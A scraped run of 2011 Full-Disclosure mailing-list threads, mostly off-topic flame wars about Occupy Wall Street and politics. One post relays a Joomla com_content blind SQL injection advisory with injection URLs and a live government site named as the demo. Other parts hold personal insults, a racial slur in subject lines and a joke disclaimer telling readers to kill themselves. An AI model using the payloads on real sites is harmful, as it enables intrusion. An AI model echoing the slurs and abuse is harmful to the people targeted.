am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question. ** IMPORTANT INFORMATION/DISCLAIMER * This document should be read only by those persons to whom it is addressed. If you have received this message it was obviously addressed to you and therefore you can read it, even it we didn't mean to send it to you. However, if the contents of this email make no sense whatsoever then you probably were not the intended recipient, or, alternatively, you are a mindless cretin; either way, you should immediately kill yourself and destroy your computer (not necessarily in that order). Once you have taken this action, please contact us.. no, sorry, you can't use your computer, because you just destroyed it, and possibly also committed suicide afterwards, but I am starting to digress.. * * The originator of this email is not liable for the transmission of the information contained in this communication. Or are they? Either way it's a pretty dull legal query and frankly one I'm not going to dwell on. But should you have nothing better to do, please feel free to ruminate on it, and please pass on any concrete conclusions should you find them. However, if you pass them on via email, be sure to include a disclaimer regarding liability for transmission. * * In the event that the originator did not send this email to you, then please return it to us and attach a scanned-in picture of your mother's brother's wife wearing nothing but a kangaroo suit, and we will immediately refund you exactly half of what you paid for the can of Whiskas you bought when you went to Pets** ** At Home yesterday. * * We take no responsibility for non-receipt of this email because we are running Exchange 5.5 and everyone knows how glitchy that can be. In the event that you do get this message then please note that we take no responsibility for that either. Nor will we accept any liability, tacit or implied, for any damage you may or may not incur as a result of receiving, or not, as the case may be, from time to time, notwithstanding all liabilities implied or otherwise, ummm, hell, where was I...umm, no matter what happens, it is NOT, and NEVER WILL BE, OUR FAULT! * * The comments and opinions expressed herein are my own and NOT those of my employer, who, if he knew I was sending emails and surfing the seamier side of the Internet, would cut off my manhood and feed it to me for afternoon tea. * -- On two occasions...I have
Re: [Full-disclosure] Joomla Component (com_content) - Blind SQL Injection Vulnerability
Which version is this? On Sat, Nov 12, 2011 at 12:35 AM, resea...@vulnerability-lab.com resea...@vulnerability-lab.com wrote: Title: == Joomla Component (com_content) - Blind SQL Injection Vulnerability Date: = 2011-11-11 References: === http://www.vulnerability-lab.com/get_content.php?id=323 VL-ID: = 323 Introduction: = Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns[citation needed], stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been more than 21 million downloads. There are over 7,400 free and commercial extensions available from the official Joomla! Extension Directory and more available from other sources (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Joomla!) Abstract: = A vulnerability laboratory researcher discovered a Blind SQL Injection vulnerability on the com_content component of the joomla CMS. Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: A blind SQL Injection vulnerability was detected on the com_content component of the joomla CMS. The vulnerability allows an attacker (remote) to inject/execute own sql statements on the affected application dbms. Successful exploitation of the vulnerability can result in compromise of the affected application dbms. Vulnerable Module(s): [+] com_content Proof of Concept: = The vulnerability can be exploited be remote attackers. For demonstration or reproduce ... 1: [Site]/joomla/index.php?option=com_contentview=archiveyear=1 [BSQLI] 2: [Site]/joomla/index.php?option=com_contentview=archiveyear=-1 or 1=1-- 3: [Site]/joomla/index.php?option=com_contentview=archiveyear=-1 or 1=0-- [x] Demo : http://www.paul.house.gov/index.php?option=com_contentview=archiveyear=-1or 1=0-- Risk: = The security risk of the blind sql injection vulnerability is estimated as critical. Credits: E.Shahmohamadi (IRAN) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2011|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [foofus-tools] discontinued?
Sounds like someone can't get enough flamewar. /eot On Thu, Oct 27, 2011 at 4:20 PM, GloW - XD doo...@gmail.com wrote: naw we fuckin hate windows it sucks. On 27 October 2011 19:20, Kristen Eisenberg kristen.eisenb...@yahoo.com wrote: Hi guys, well first of all thanx for building a tool like fgdump :) but i'm worried, since 2k8 there is no update and it would be very sad if it's discontinued... are you planning another release? Kristen Eisenberg Billige Flüge Marketing GmbH Emanuelstr. 3, 10317 Berlin Deutschland Telefon: +49 (33) 5310967 Email: utebachmeier at gmail.com Site: http://flug.airego.de - Billige Flüge vergleichen ___ foofus-tools mailing list foofus-to...@lists.foofus.net http://lists.foofus.net/listinfo.cgi/foofus-tools-foofus.net ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
Funny, Anonymous' tagline seems to be either with us, or you're corrupt. Happens that everyone I know well wouldn't touch Anonymous with a barge pole. I may arguably be naive, but I'm certainly not corrupt. So it seems they're yet another pawn... Not that it's anything new, really. On Mon, Oct 17, 2011 at 1:07 AM, Ryan Dewhurst ryandewhu...@gmail.comwrote: http://www.linkedin.com/in/tommyryan On Mon, Oct 17, 2011 at 12:05 AM, Jeffrey Walton noloa...@gmail.com wrote: On Sun, Oct 16, 2011 at 6:56 PM, Ivan . ivan...@gmail.com wrote: http://gawker.com/5850054/meet-the-guy-who-snitched-on-occupy-wall-street-to-the-fbi-and-nypd Thomas Ryan is definitely not the brightest fellow in computer security: We have been heavily monitoring Occupy Wall Street, and Anonymous. Aaron Barr did similar, ruined the company he worked for (HBGary Federal) and lost his job in the process. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Full-flame-war] There used to be a security mailing list at this address.
Guess it all depends on who's topposting... On Sat, Oct 15, 2011 at 6:27 AM, dave bl db.pub.m...@gmail.com wrote: On 15 October 2011 14:11, Thor (Hammer of God) t...@hammerofgod.com wrote: Haven't we made it to the point where top posting is OK? I mean, it works from a Ped Xing standpoint, why not here? It is REALLY that bad? I thought this was a security mailing list not an exercise in how not to do it TM. Also, top-posting really isn't that big of a deal. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
Yes, since humanity is a great success in a fragmented form. Not. Then again, there are those that believe the end of the world will come when man stops fighting with each other, so I suppose even culture and tradition are against me on this one. Fair enough, I don't quite care about the damage some are inflicting to themselves. Which brings us back to the 99% discussion; some seem they're doing some form of good by making us redact a few steps in the course of progress. On Fri, Oct 14, 2011 at 1:26 PM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: ...And what, exactly, gave the US the right to be there in the first place? Non existant WMD? Human rights? The US has to stop seeing themselves as international police. /ends miniature rant On Fri, Oct 14, 2011 at 7:28 AM, Mike Hale eyeronic.des...@gmail.comwrote: Obviously not. Again. They looked like they had weapons. The pilots weren't wondering...they were sure they saw weapons. They then engaged what appeared to be a clear threat to other US forces nearby. The pilots acted exactly as they should have, given the information presented to them. This was a war zone, not a country club. On Thu, Oct 13, 2011 at 11:23 PM, Jeffrey Walton noloa...@gmail.com wrote: On Fri, Oct 14, 2011 at 2:19 AM, Mike Hale eyeronic.des...@gmail.com wrote: Except that they weren't obviously unarmed. Not only where they not obviously unarmed, they appeared to be armed. Look at the 4 minute mark. That sure as shit looks like an RPG. The crew thought the group was armed. Ergo, they were cleared to engage. This wasn't a war crime...and the allegation that it was just makes people look ridiculous. Listen to yourself: we weren't sure if they were armed, so we killed them. Put yourself and your family in the shoes of the dead folks. Its not a comfortable place to be, is it? Jeff On Thu, Oct 13, 2011 at 11:05 PM, valdis.kletni...@vt.edu wrote: On Thu, 13 Oct 2011 22:44:44 PDT, Mike Hale said: Seriously! Think about the injustice of having American helicopters engage armed individuals shadowing American soldiers. Shooting at armed individuals is one thing. If it's civilians and Reuters employees who *aren't* obviously armed, it's something else. -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
Resorting to personal attacks? Nice. Technical skills in what? Running a wordpress blog? Defacing a website? Growing pot? I rarely publicise any materials, most of the time I just tell whoever is responsible to do a fix. I'm not really running after publicity, unlike you guys. Also note that I never said I'm a seasoned hacker... in fact, my occupation is quite on the opposite side of the spectrum... You also seem to know more than I do what the Ubuntu VM I have contains. But that must make all the difference! I mean, people that don't know qubits from bits shouldn't be allowed in such discussions (of course there's wikipedia...) On Fri, Oct 14, 2011 at 6:38 PM, Georgi Guninski gunin...@guninski.comwrote: Christian Sciberras, I have trouble judging your technical skills - all I have seen is bad smalltalk. Do you have any technical publications you can share so I can judge? btw, the best i found was you could could reproduce a bug in a CMS and in addition you can't tell root from user password on vanilla ubuntu. -- joro On Fri, Oct 14, 2011 at 02:11:13AM +0200, Christian Sciberras wrote: So if they cause damage for profit that makes it ok? No. But it's certainly better than doing damage without profit. Making profit means that at the end of the day, the money's going to go somewhere further in the chain. Flattening a tower, for instance, or attacking the local bank that refused to give you a loan because of the time you spent in a cell, isn't as productive. Neither is it making a company loose clients/profit just because they decided they don't want you to use their services (as if you did have a right in the first place...). And yes I acknowledge the American public has a measure of responsibility in the situation too, human beings are by nature imperfect, but the largest share of responsibility lies with the names listed below. The largest share? I can see Ex-president Bush trying to sell you a bottle of beer for $10 dollars ($7 profit). Wait, I can't. That sort of thing has happened to me and I paid back every dime of it, most people are decent human beings and would do the same. Most people? I could have sworn 90% of the people in the NYC subway would thank $deity if you suddenly dropped dead so they could get things off you. Call me cynical, but I wouldn't trust anyone else in such cases, other than myself. Regarding that list of yours, great! Now we just need a little more effort. For each of those persons, please enlighten us as to what they did legally wrong. Of course, the people that landed in jail shouldn't be counted. The 99% protest is a modern one committed to change, it just can't right wrongs by pointing at jailed people. On Thu, Oct 13, 2011 at 11:35 PM, Laurelai laure...@oneechan.org wrote: On 10/13/2011 9:18 AM, Christian Sciberras wrote: I simply acknowledge the fact that some people work hard to get obscenely rich, but I just can't stand people that cause damage for the fun of it. So if they cause damage for profit that makes it ok? Yes, I stick for everyone that minds his business, instead of ruining others' for the fun of it. What bothers me is the fact that those hypocrites (protesters) are crying out loud against some people they're highly envious of with the excuse of the depression. Well, here's the news; the famous depression has been brought about by these same people! And yes I acknowledge the American public has a measure of responsibility in the situation too, human beings are by nature imperfect, but the largest share of responsibility lies with the names listed below. If someone above is collecting free money because of incentives for people to spend money (and which seem to work well), I can't blame him. Yes because trickle down theory worked *so* well How many times in your life have you paid back something you received by mistake and which wasn't yours? While I would foremost applaud anyone that would right such a wrong, I just can't ignore the fact that those people out there representing the 99% are big-time hypocrites. That sort of thing has happened to me and I paid back every dime of it, most people are decent human beings and would do the same. On a different argument, since you seem to know well enough how some of the 1% are doing immoral things, why don't you start by handing out names instead of talking air just as the 99% crowd has been doing up till now? *Alan Greenspan, chairman of US Federal Reserve 1987- 2006 **Mervyn King, governor of the Bank of England **Bill Clinton, former US president* *Gordon Brown, prime minister* *George W Bush, former US president* *Senator Phil Gramm **Abby Cohen, Goldman Sachs chief US strategist **Kathleen Corbet, former CEO, Standard Poor's
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
Yeah, let's just all ignore low insults. The world would be a much better place without them and whoever said them in the first place... On Fri, Oct 14, 2011 at 11:02 PM, Laurelai laure...@oneechan.org wrote: On 10/14/2011 2:25 PM, Christian Sciberras wrote: Resorting to personal attacks? Nice. Technical skills in what? Running a wordpress blog? Defacing a website? Growing pot? I rarely publicise any materials, most of the time I just tell whoever is responsible to do a fix. I'm not really running after publicity, unlike you guys. Also note that I never said I'm a seasoned hacker... in fact, my occupation is quite on the opposite side of the spectrum... You also seem to know more than I do what the Ubuntu VM I have contains. But that must make all the difference! I mean, people that don't know qubits from bits shouldn't be allowed in such discussions (of course there's wikipedia...) On Fri, Oct 14, 2011 at 6:38 PM, Georgi Guninski gunin...@guninski.comwrote: Christian Sciberras, I have trouble judging your technical skills - all I have seen is bad smalltalk. Do you have any technical publications you can share so I can judge? btw, the best i found was you could could reproduce a bug in a CMS and in addition you can't tell root from user password on vanilla ubuntu. -- joro On Fri, Oct 14, 2011 at 02:11:13AM +0200, Christian Sciberras wrote: So if they cause damage for profit that makes it ok? No. But it's certainly better than doing damage without profit. Making profit means that at the end of the day, the money's going to go somewhere further in the chain. Flattening a tower, for instance, or attacking the local bank that refused to give you a loan because of the time you spent in a cell, isn't as productive. Neither is it making a company loose clients/profit just because they decided they don't want you to use their services (as if you did have a right in the first place...). And yes I acknowledge the American public has a measure of responsibility in the situation too, human beings are by nature imperfect, but the largest share of responsibility lies with the names listed below. The largest share? I can see Ex-president Bush trying to sell you a bottle of beer for $10 dollars ($7 profit). Wait, I can't. That sort of thing has happened to me and I paid back every dime of it, most people are decent human beings and would do the same. Most people? I could have sworn 90% of the people in the NYC subway would thank $deity if you suddenly dropped dead so they could get things off you. Call me cynical, but I wouldn't trust anyone else in such cases, other than myself. Regarding that list of yours, great! Now we just need a little more effort. For each of those persons, please enlighten us as to what they did legally wrong. Of course, the people that landed in jail shouldn't be counted. The 99% protest is a modern one committed to change, it just can't right wrongs by pointing at jailed people. On Thu, Oct 13, 2011 at 11:35 PM, Laurelai laure...@oneechan.org wrote: On 10/13/2011 9:18 AM, Christian Sciberras wrote: I simply acknowledge the fact that some people work hard to get obscenely rich, but I just can't stand people that cause damage for the fun of it. So if they cause damage for profit that makes it ok? Yes, I stick for everyone that minds his business, instead of ruining others' for the fun of it. What bothers me is the fact that those hypocrites (protesters) are crying out loud against some people they're highly envious of with the excuse of the depression. Well, here's the news; the famous depression has been brought about by these same people! And yes I acknowledge the American public has a measure of responsibility in the situation too, human beings are by nature imperfect, but the largest share of responsibility lies with the names listed below. If someone above is collecting free money because of incentives for people to spend money (and which seem to work well), I can't blame him. Yes because trickle down theory worked *so* well How many times in your life have you paid back something you received by mistake and which wasn't yours? While I would foremost applaud anyone that would right such a wrong, I just can't ignore the fact that those people out there representing the 99% are big-time hypocrites. That sort of thing has happened to me and I paid back every dime of it, most people are decent human beings and would do the same. On a different argument, since you seem to know well enough how some of the 1% are doing immoral things, why don't you start by handing out names instead of talking air just as the 99% crowd has been doing up till now? *Alan Greenspan, chairman of US Federal Reserve 1987
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
You think I'm biting that? Skinny and under-age is just about everything you could come up with. Congrats for creativity. Just because two of you decided you found common grounds for insult doesn't mean you're god-almighty-indisputably-right in every piece of shit you come up with. Did I mention it's shit? With that, I give you one, you have a point, I should have stopped responding ever since some guy decided to equate a couple dozen of people into America's 1%. Strange, thought security guys would have been better with numbers... On Sat, Oct 15, 2011 at 2:32 AM, Laurelai laure...@oneechan.org wrote: On 10/14/2011 6:32 PM, xD 0x41 wrote: Cristiano , per favor' mi dai dieci minuti scusa mi ma, e' essentiale .. You really dont realise how much, you attack others when they post, NOMATTER what the topic... yet you are still wondering why somany people seem to despise your skinny little nerdy ass... well, nerdy isnt bad, but, your a downright lookalike for mr.Bean aka rowan atkinson. You could maybe do his stunts, to ? Your the one who is usually abusing others, before the finality wich is simply adults not reesponding, to the baby whos crying out for more aarguements. You should stfu, and learn more, you assume to know all, in every post, your the brain, yet you are lame, i looked everything up abiout you, and yes, go ahead, and setup a nice wordpress secure setting, php wise to, then yes, id maybe hink your atleast a halfwit ;) Anyhow, your basically a tr0ll, and, you seem to keep goading, even AFTER the others, have completely stopped responding to you, simply because, Laurelai was right, why would anyone want to keep up a thread wich has now turned malign, as i forsaw a week ago, but, i did not think it would even make a week, People like you, keep inspiring the flame to burn brighter.. wich to me, is nastier than any *abuse* names, wich, you clearly have not counted howmany times you have actually called others, some form of rude name/word/personal attack. Maybe when you GROW UP, and behave as an adult, then I would assume the list will start to hear you, even through the bs. Anyhow, i applaud you, for *coming out* as to say, I mean, putting your pic up, like that, mate, you could be a pornstar! what you doin online :P~~~bahahaha go back to grade.2 then repeate it, then move on... then, if you work out how to call 911, call someone who gives a shit. Idiotic kid, grow the hell up. xd-- // IND SEC CONSILTANT FOR Yep yep Security (simply coz it sounds good) YEP YEP for all your Hat attire needs! On 15 October 2011 08:57, Christian Sciberras uuf6...@gmail.com wrote: Yeah, let's just all ignore low insults. The world would be a much better place without them and whoever said them in the first place... On Fri, Oct 14, 2011 at 11:02 PM, Laurelai laure...@oneechan.org wrote: On 10/14/2011 2:25 PM, Christian Sciberras wrote: Resorting to personal attacks? Nice. Technical skills in what? Running a wordpress blog? Defacing a website? Growing pot? I rarely publicise any materials, most of the time I just tell whoever is responsible to do a fix. I'm not really running after publicity, unlike you guys. Also note that I never said I'm a seasoned hacker... in fact, my occupation is quite on the opposite side of the spectrum... You also seem to know more than I do what the Ubuntu VM I have contains. But that must make all the difference! I mean, people that don't know qubits from bits shouldn't be allowed in such discussions (of course there's wikipedia...) On Fri, Oct 14, 2011 at 6:38 PM, Georgi Guninski gunin...@guninski.comwrote: Christian Sciberras, I have trouble judging your technical skills - all I have seen is bad smalltalk. Do you have any technical publications you can share so I can judge? btw, the best i found was you could could reproduce a bug in a CMS and in addition you can't tell root from user password on vanilla ubuntu. -- joro On Fri, Oct 14, 2011 at 02:11:13AM +0200, Christian Sciberras wrote: So if they cause damage for profit that makes it ok? No. But it's certainly better than doing damage without profit. Making profit means that at the end of the day, the money's going to go somewhere further in the chain. Flattening a tower, for instance, or attacking the local bank that refused to give you a loan because of the time you spent in a cell, isn't as productive. Neither is it making a company loose clients/profit just because they decided they don't want you to use their services (as if you did have a right in the first place...). And yes I acknowledge the American public has a measure of responsibility in the situation too, human beings are by nature imperfect, but the largest share of responsibility lies with the names listed below. The largest share? I can see Ex-president Bush trying to sell you a bottle of beer for $10 dollars ($7 profit
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
So, if in practice the 99% enjoy privileges a notch less than the 1%, where did the 99% go to? On Wed, Oct 12, 2011 at 7:52 PM, Thor (Hammer of God) t...@hammerofgod.comwrote: I know that if I was starving to death and couldn't afford medical care for my children that I wouldn't be sitting around with a $500 camera editing my photos with $700 software on a $1000 computer. Nor would I be sitting around in my apartment all day posting my woes on the Internet while the REAL 99% are having the tax dollars used to support these people taken out of their check. And you know there is no way to know if they bought the items second hand or if they were donated/gifted to them. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
I simply acknowledge the fact that some people work hard to get obscenely rich, but I just can't stand people that cause damage for the fun of it. Yes, I stick for everyone that minds his business, instead of ruining others' for the fun of it. What bothers me is the fact that those hypocrites (protesters) are crying out loud against some people they're highly envious of with the excuse of the depression. Well, here's the news; the famous depression has been brought about by these same people! If someone above is collecting free money because of incentives for people to spend money (and which seem to work well), I can't blame him. How many times in your life have you paid back something you received by mistake and which wasn't yours? While I would foremost applaud anyone that would right such a wrong, I just can't ignore the fact that those people out there representing the 99% are big-time hypocrites. On a different argument, since you seem to know well enough how some of the 1% are doing immoral things, why don't you start by handing out names instead of talking air just as the 99% crowd has been doing up till now? On Thu, Oct 13, 2011 at 2:32 PM, Laurelai laure...@oneechan.org wrote: On 10/13/2011 1:29 AM, Christian Sciberras wrote: So, if in practice the 99% enjoy privileges a notch less than the 1%, where did the 99% go to? On Wed, Oct 12, 2011 at 7:52 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: I know that if I was starving to death and couldn't afford medical care for my children that I wouldn't be sitting around with a $500 camera editing my photos with $700 software on a $1000 computer. Nor would I be sitting around in my apartment all day posting my woes on the Internet while the REAL 99% are having the tax dollars used to support these people taken out of their check. And you know there is no way to know if they bought the items second hand or if they were donated/gifted to them. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ I would say that the life we have is significantly less than the 1% and pretending otherwise is just silly, the 1% have a majority of the money and power and have manipulated the system to give them even more at the expense of the 99%, its gotten to the point where those in power are blatantly doing illegal and immoral things because they know they can get away with this. They quite literally destroyed the economy for the 99% just to make themselves a profit *and* they won't be held accountable for it. I don't care if someone is wealthy or even obscenely rich, what *does* bother me is to knowingly cause so much damage to the global economy for their own personal gain, that is just *insane* you are the first to complain about the cost of damages that people like lulzsec/antisec do but you don't blink an eye at the people who quite literally destroyed the economy...in fact your sticking up for them. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Military: Computer Virus Wasn't Directed at Drones
Here's another lesson *you* should learn; read what others say twice if you can't understand it the first time. I don't remember the focus of the discussion was on the malware per se, but more about questioning competence behind the responsible people. On Thu, Oct 13, 2011 at 11:02 PM, andrew.wallace andrew.wall...@rocketmail.com wrote: The computer virus that hit the Pentagon's drone program last month was not directed at the military systems but was common malware used to steal log-ins and passwords used in online gaming, military officials said Wednesday. http://abcnews.go.com/Technology/wireStory/military-computer-virus-directed-drones-14725058 Lesson to learn, stop reading Wired magazine web site. --- Andrew Wallace Independent consultant www.n3td3v.org.uk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
So if they cause damage for profit that makes it ok? No. But it's certainly better than doing damage without profit. Making profit means that at the end of the day, the money's going to go somewhere further in the chain. Flattening a tower, for instance, or attacking the local bank that refused to give you a loan because of the time you spent in a cell, isn't as productive. Neither is it making a company loose clients/profit just because they decided they don't want you to use their services (as if you did have a right in the first place...). And yes I acknowledge the American public has a measure of responsibility in the situation too, human beings are by nature imperfect, but the largest share of responsibility lies with the names listed below. The largest share? I can see Ex-president Bush trying to sell you a bottle of beer for $10 dollars ($7 profit). Wait, I can't. That sort of thing has happened to me and I paid back every dime of it, most people are decent human beings and would do the same. Most people? I could have sworn 90% of the people in the NYC subway would thank $deity if you suddenly dropped dead so they could get things off you. Call me cynical, but I wouldn't trust anyone else in such cases, other than myself. Regarding that list of yours, great! Now we just need a little more effort. For each of those persons, please enlighten us as to what they did legally wrong. Of course, the people that landed in jail shouldn't be counted. The 99% protest is a modern one committed to change, it just can't right wrongs by pointing at jailed people. On Thu, Oct 13, 2011 at 11:35 PM, Laurelai laure...@oneechan.org wrote: On 10/13/2011 9:18 AM, Christian Sciberras wrote: I simply acknowledge the fact that some people work hard to get obscenely rich, but I just can't stand people that cause damage for the fun of it. So if they cause damage for profit that makes it ok? Yes, I stick for everyone that minds his business, instead of ruining others' for the fun of it. What bothers me is the fact that those hypocrites (protesters) are crying out loud against some people they're highly envious of with the excuse of the depression. Well, here's the news; the famous depression has been brought about by these same people! And yes I acknowledge the American public has a measure of responsibility in the situation too, human beings are by nature imperfect, but the largest share of responsibility lies with the names listed below. If someone above is collecting free money because of incentives for people to spend money (and which seem to work well), I can't blame him. Yes because trickle down theory worked *so* well How many times in your life have you paid back something you received by mistake and which wasn't yours? While I would foremost applaud anyone that would right such a wrong, I just can't ignore the fact that those people out there representing the 99% are big-time hypocrites. That sort of thing has happened to me and I paid back every dime of it, most people are decent human beings and would do the same. On a different argument, since you seem to know well enough how some of the 1% are doing immoral things, why don't you start by handing out names instead of talking air just as the 99% crowd has been doing up till now? *Alan Greenspan, chairman of US Federal Reserve 1987- 2006 **Mervyn King, governor of the Bank of England **Bill Clinton, former US president* *Gordon Brown, prime minister* *George W Bush, former US president* *Senator Phil Gramm **Abby Cohen, Goldman Sachs chief US strategist **Kathleen Corbet, former CEO, Standard Poor's **Hank Greenberg, AIG insurance group **Andy Hornby, former HBOS boss **Steve Crawshaw, former BB boss **Adam Applegarth, former Northern Rock boss **Dick Fuld, Lehman Brothers chief executive **Ralph Cioffi and Matthew Tannin **Lewis Ranieri **Joseph Cassano, AIG Financial Products **Chuck Prince, former Citi boss **Angelo Mozilo, Countrywide Financial **Stan O'Neal, former boss of Merrill Lynch* *Jimmy Cayne, former Bear Stearns boss **Christopher Dodd, chairman, Senate banking committee (Democrat) **Geir Haarde, Icelandic prime minister **John Tiner, FSA chief executive, 2003-07* Oh yeah and lets not forget about this guy http://www.time.com/time/specials/packages/article/0,28804,1877351_1877350_1877337,00.html And while he is thankfully spending time in a prison cell, so many other names on this list go free, in fact a good chunk of them made a profit off of the disaster. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
Darren's and indeed many other people's lame excuse is that they're too humble to be greedy. As if! If anything, most people are greedier than that 1%. The only difference is that people are bad at it, unlike that 1%. Just consider the fact that Average Joe would be just too happy to evade tax. Richer Joe, instead, might be doing the same with his $1bn business. In both cases, they're breaking the law. The occupy wallstreet movement is simply hypocrisy. Did I happen to mention that I'm far from rich? In the coming years, I'll be struggling to get my own drop of land. The only unfair part I see is people complaining while buying iPads and iCrap over Facebook, Twitter etc.. On Tue, Oct 11, 2011 at 6:07 PM, Jeffrey Walton noloa...@gmail.com wrote: On Tue, Oct 11, 2011 at 9:25 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Chris - Empathy, guilt, and morals. Guilt being a major factor. The possibility was always there to make millions via evil means, but morals and knowing it would be hard to live with. The problem is not getting lots of money. That is the easy part. The issue is with living with yourself afterward. How about illegal? Check out the Hobbs Act [1]. I'm not making this crap up - the US has laws on the books for negatively affecting commerce (which the crash did), and using fear to peddle their warez (how financial institutions market their instruments). There's probably provisions in the PATRIOT Act, too. The last tine I checked (about a year ago), the SEC had opened fewer than 100 civil investigations. No criminal investigations, despite the fact that some of the financial institutions created spurious ratings companies just to rate their instruments 'good'. Jeff [1] http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/131mcrm.htm On Tue, Oct 11, 2011 at 12:43 AM, Bob Dobbs bobd10...@gmail.com wrote: On Mon, Oct 10, 2011 at 10:57 AM, Jeffrey Walton noloa...@gmail.com wrote: Who are the real threats to the US: terrorist who try to dream up ways to do the US harm, or Corporate and Congress which does the US harm? I hate to contribute to an off-topic thread but you've successfully trolled me here: Congress has done FAR more harm to the US than terrorists over the last 10 years by just about every measure. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
